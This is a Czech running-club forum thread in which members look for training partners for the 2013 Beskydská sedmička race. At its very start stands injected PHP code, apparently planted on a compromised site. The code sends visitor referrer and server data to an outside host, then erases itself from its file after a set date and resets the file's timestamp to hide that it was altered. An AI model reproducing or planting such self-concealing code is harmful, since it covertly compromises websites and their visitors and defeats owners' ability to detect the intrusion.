check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735874){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776897&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } hledám parťáka na b7 2013

www.continental.cz
HLAVNÍ STRÁNKAROČNÍK 2012FOTOGALERIEDISKUSNÍ FORUME-SHOP
Vítej, Guest
Uživatelské jméno: Heslo: Zapamatovat si mne
  • Strana:
  • 1
  • 2

PŘÍSPĚVEK: hledám parťáka na b7 2013

Re: hledám parťáka na b7 2013 před 6 roky, 8 měsíci #1780

Zdar, možná bych pro tebe parťáka měl - parťákův kámoš. Ale můžem napřed zkusit společný trénink - na něm se pozná, jestli by pro tebe byl vhodný, nebo jestli bysme našli někoho jiného. Jsem z Přílep a každou neděli v 8 hod. vyrážím na prům. 25 km trénink. Do oběda jsme zpátky (na oběd tě ale nezvu ). - ozvi se na mail: Tato emailová adresa je chráněna před spamboty, abyste ji viděli, povolte JavaScript . Roman.
The topic has been locked.

Re: hledám parťáka na b7 2013 před 6 roky, 7 měsíci #1856

Čau jsem taky ze Zlína.
A chtěl bych taky zkusit Beskydskou sedmičku a hledám partáka. Je mi 18 a pravidelně běhám a chtěl bych zkusit to zaběhnout pod 20 hodin tak kdyby měl někdo zájem tak ať napíše na Tato emailová adresa je chráněna před spamboty, abyste ji viděli, povolte JavaScript

Re: hledám parťáka na b7 2013 před 6 roky, 7 měsíci #1878

Pokusová - Ahoj nechtěla by jsi společně trénovat došel jsem to v mezích limitu
  • Strana:
  • 1
  • 2
Time to create page: 0.59 seconds

GENERÁLNÍ PARTNEŘI

adidas

1511

PARTNEŘI